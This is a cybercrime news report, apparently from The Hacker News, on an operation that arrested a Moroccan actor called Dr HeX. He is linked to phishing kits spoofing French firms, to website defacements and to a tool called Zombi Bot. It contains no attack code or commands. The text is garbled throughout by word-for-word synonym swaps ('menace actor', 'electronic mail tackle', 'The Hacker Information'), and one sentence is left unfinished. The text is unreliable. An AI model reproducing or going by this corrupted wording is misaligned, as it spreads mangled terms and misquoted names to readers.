Regulation enforcement authorities withhave apprehended a menace actor presumably answerable for a number of assaults on telecom corporations, main banks, and multinational companies in France with the objective of stealing clients’ financial institution info.
The 2-year investigation, dubbed Operation Lyrebird by the worldwide, intergovernmental group, resulted within the arrest of a Moroccan citizen nicknamed Dr HeX, cybersecurity agency Group-IB disclosed as we speak in a report shared with The Hacker Information.
Dr HeX is alleged to have been “lively since a minimum of 2009 and is answerable for quite a lot of cybercrimes, together with phishing, defacing, malware improvement, fraud, and carding that resulted in hundreds of unsuspecting victims,” the cybersecurity.
The cyberattacks concerned deploying a phishing package consisting of net pages spoofing French corporations, adopted by sending mass emails impersonating the focused corporations, prompting electronic mail recipients to enter login info on the spoofed website. The credentials entered by unsuspecting victims on the faux net web page have been then redirected to the perpetrator’s electronic mail. Not less than three phishing kits presumably developed by the menace actor have been extracted.
The scripts included within the phishing package contained the title Dr HeX and the person’s contact electronic mail tackle, which was then used to establish and deanonymize the cybercriminal, within the course of uncovering a YouTube channel in addition to one other title utilized by the attacker to register a minimum of two fraudulent domains that have been used within the assaults.
Moreover, Group-IB stated it was additionally in a position to map the e-mail tackle to the malicious infrastructure employed by the accused in varied phishing campaigns, of which included as many as 5 electronic mail addresses, six nicknames, and his accounts on Skype, Fb, Instagram, and YouTube.
In all, Dr Hex’s digital footprint left a tell-tale path of malicious actions over a interval stretching between 2009 and 2018, throughout when the menace actor defaced no fewer than 130 net pages, together with discovering posts created by the attacker on totally different underground boards dedicated to malware buying and selling and proof suggesting his involvement in assaults on French companies to steal monetary info.
“The suspect, particularly, promoted so-called Zombi Bot, which allegedly contained 814 exploits, together with 72 non-public ones, a brute-forcer, webshell and backdoor scanners, in addition to performance to hold out DDoS assaults,” Group-IB CTO Dmitry Volkov informed The Hacker Information.